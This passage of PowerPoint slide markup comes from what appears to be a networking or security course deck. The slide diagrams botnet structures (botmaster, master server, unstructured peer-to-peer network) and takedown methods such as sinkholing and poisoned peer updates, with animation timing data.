          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7344544" y="5752927"/>
            <a:ext cx="1858575" cy="197101"/>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12" name="Straight Connector 111">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{845BC848-0AF2-4C6A-B853-649640DEAF0D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1">
            <a:off x="7402338" y="4301299"/>
            <a:ext cx="558854" cy="1631508"/>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15" name="Straight Connector 114">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B4463B22-CB0C-4DC0-A700-F520C6E15B75}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvCxnSpPr>
            <a:cxnSpLocks/>
          </p:cNvCxnSpPr>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm flipH="1" flipV="1">
            <a:off x="6901767" y="2921014"/>
            <a:ext cx="1122105" cy="1294452"/>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p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2534157" y="2497262"/>
            <a:ext cx="1396127" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Master Server</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="TextBox 19"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3282900" y="362910"/>
            <a:ext cx="1485920" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" err="1"/>
              <a:t>Botmaster</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2400" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="2050" name="Picture 2" descr="D:\Classes\CS 4700\assets\devil-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1079" y="738436"/>
            <a:ext cx="979261" cy="9792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Classes\CS 4700\assets\serv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9277" y="2501468"/>
            <a:ext cx="881062" cy="8810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2482" y="2081551"/>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2353" y="5510275"/>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9852" y="441117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4622" y="2620600"/>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999" y="5624483"/>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7951" y="3304525"/>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5834" y="3992975"/>
            <a:ext cx="616648" cy="616648"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:extLst>
            <a:ext uri="{909E8E84-426E-40DD-AFC4-6F175D3DCCD1}">
              <a14:hiddenFill xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
              </a14:hiddenFill>
            </a:ext>
          </a:extLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="2049" name="TextBox 2048"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9496783" y="2167183"/>
            <a:ext cx="2216693" cy="830997"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>Unstructured P2P Network</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="57" name="Picture 56">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8FD67C5-82A0-463F-8FEA-F1FEC4868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546" y="1951022"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="58" name="Picture 57">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5E3A58C1-7BEA-48C0-B1DF-768CD0EF8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180" y="2605179"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="60" name="Picture 59">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{039F1598-5D12-4992-85B1-42492C9C5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335" y="4003954"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="63" name="Picture 62">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0AFE9D5F-0360-48C6-A6C8-523880B37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2916" y="3347156"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="65" name="Picture 64">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A0543F34-0590-4302-8AB9-6537FE3EA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212" y="5820578"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="66" name="Picture 65">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{078DF791-F8C1-4B31-9F0B-432F0CD3E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8341" y="5856129"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="67" name="Picture 66">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3EDDBA85-98FC-4988-8159-7472D345B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1515" y="4740903"/>
            <a:ext cx="423025" cy="423025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="53" name="TextBox 52">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{02A48282-109B-4FDC-8845-C21B2263F1CC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="813143" y="6064432"/>
            <a:ext cx="569387" cy="461665"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0"/>
              <a:t>FBI</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="54" name="Picture 53">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{19E5E081-3F84-46B6-8E3A-57D410E9A9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217" y="5097194"/>
            <a:ext cx="967238" cy="967238"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="62" name="Multiplication Sign 61">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6EF46E0D-389E-4D4D-A67F-9AE4872E53F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3525569" y="2245226"/>
            <a:ext cx="1311675" cy="1311675"/>
          </a:xfrm>
          <a:prstGeom prst="mathMultiply">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9" name="Speech Bubble: Rectangle 68">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5A86AEB2-0D2C-4597-80EF-26B9D51F3353}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="729692" y="3500272"/>
            <a:ext cx="1809186" cy="1044980"/>
          </a:xfrm>
          <a:prstGeom prst="wedgeRectCallout">
            <a:avLst>
              <a:gd name="adj1" fmla="val 13"/>
              <a:gd name="adj2" fmla="val 1311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Poison Peer Update</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="70" name="Picture 69">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{16A75F09-87A9-4E52-8A4C-9F01F030BB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3035" y="4444101"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="71" name="Picture 70">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C55A7066-106F-4B5C-804B-F3915C7760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7248" y="4452513"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="28" name="Group 27">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A91D730B-7ACE-4ABD-AF04-B27FE4A7340F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="2374452" y="4893286"/>
            <a:ext cx="1295760" cy="1603750"/>
            <a:chOff x="2374452" y="4893286"/>
            <a:chExt cx="1295760" cy="1603750"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="2" name="Oval 1">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C0FC7467-81BF-4209-A522-C686DC384575}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2374452" y="5312610"/>
              <a:ext cx="1295760" cy="71064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8832F957-F639-4A45-A900-C8BE4CCFCAC0}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr txBox="1"/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2399405" y="6035371"/>
              <a:ext cx="1245854" cy="461665"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" rtlCol="0">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" sz="2400" dirty="0"/>
                <a:t>Sinkhole</a:t>
              </a:r>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:pic>
          <p:nvPicPr>
            <p:cNvPr id="90" name="Picture 2" descr="C:\Users\t0ph3r\Documents\CS 4700\assets\black_server.png">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C2726D37-02FB-43C4-9D17-D03FB28B6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033" y="4893286"/>
              <a:ext cx="962154" cy="96215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2051">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{998CFA24-0BAA-4213-ABB3-1E9630C878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9775" y="5439867"/>
            <a:ext cx="744134" cy="744134"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="70342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14" presetClass="exit" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animEffect transition="out" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="12" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="13" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="119"/>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135"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="16" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="135"/>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129"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="19" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="129"/>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145"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="22" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="145"/>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148"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="25" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="148"/>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132"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="28" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="132"/>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139"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="31" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="139"/>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155"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="34" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="155"/>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126"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="37" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="499"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="1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anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="43" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="44" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="28"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_y+.1"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_y"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="45" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="46" presetID="22" presetClass="entr" presetSubtype="2" fill="hold" nodeType="after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wipe(right)">
                                      <p:cBhvr>
                                        <p:cTn id="48" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="64"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="49" presetID="22" presetClass="entr" presetSubtype="8"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left)">
                                      <p:cBhvr>
                                        <p:cTn id="51" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="68"/>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052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="56" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>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fade">
                                      <p:cBhvr>
                                        <p:cTn id="60" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="61" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="69"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr>
                                        <p:cTn id="62" dur="5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childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="68" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="69" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -1.45833E-6 -3.7037E-6 L 0.11667 -0.03773 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="70" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="5833" y="-1898"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="71" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="72" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.11667 -0.03773 L 0.30039 -0.15231 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="73" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="9180" y="-5741"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="74" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="1500"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="75" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="76" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="77" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="78" presetID="14" presetClass="entr" presetSubtype="10" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:set>
                                      <p:cBhvr>
                                        <p:cTn id="79" dur="1" fill="hold">
                                          <p:stCondLst>
                                            <p:cond delay="0"/>
                                          </p:stCondLst>
                                        </p:cTn>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>style.visibility</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:to>
                                        <p:strVal val="visible"/>
                                      </p:to>
                                    </p:set>
                                    <p:animEffect transition="in" filter="randombar(horizontal)">
                                      <p:cBhvr>
                                        <p:cTn id="80" dur="500"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                      </p:cBhvr>
                                    </p:animEffect>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                            </p:childTnLst>
                          </p:cTn>
                        </p:par>
                        <p:par>
                          <p:cTn id="81" fill="hold">
                            <p:stCondLst>
                              <p:cond delay="2000"/>
                            </p:stCondLst>
                            <p:childTnLst>
                              <p:par>
                                <p:cTn id="82" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="afterEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 0.30039 -0.15231 L 0.43399 -0.42639 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="83" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="2052"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="6680" y="-13704"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="84" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M 4.16667E-7 -3.33333E-6 L 0.21862 -0.07407 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="85" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="70"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:rCtr x="10924" y="-3704"/>
                                    </p:animMotion>
                                  </p:childTnLst>
                                </p:cTn>
                              </p:par>
                              <p:par>
                                <p:cTn id="86" presetID="42" presetClass="path" presetSubtype="0" accel="50000" decel="50000" fill="hold" nodeType="withEffect">
                                  <p:stCondLst>
                                    <p:cond delay="0"/>
                                  </p:stCondLst>
                                  <p:childTnLst>
                                    <p:animMotion origin="layout" path="M -2.08333E-7 -2.22222E-6 L 0.16302 0.15996 " pathEditMode="relative" rAng="0" ptsTypes="AA">
                                      <p:cBhvr>
                                        <p:cTn id="87" dur="500" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="71"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                          <p:attrName>ppt_y</p:attrName>
                                        </p:attrNameLst>
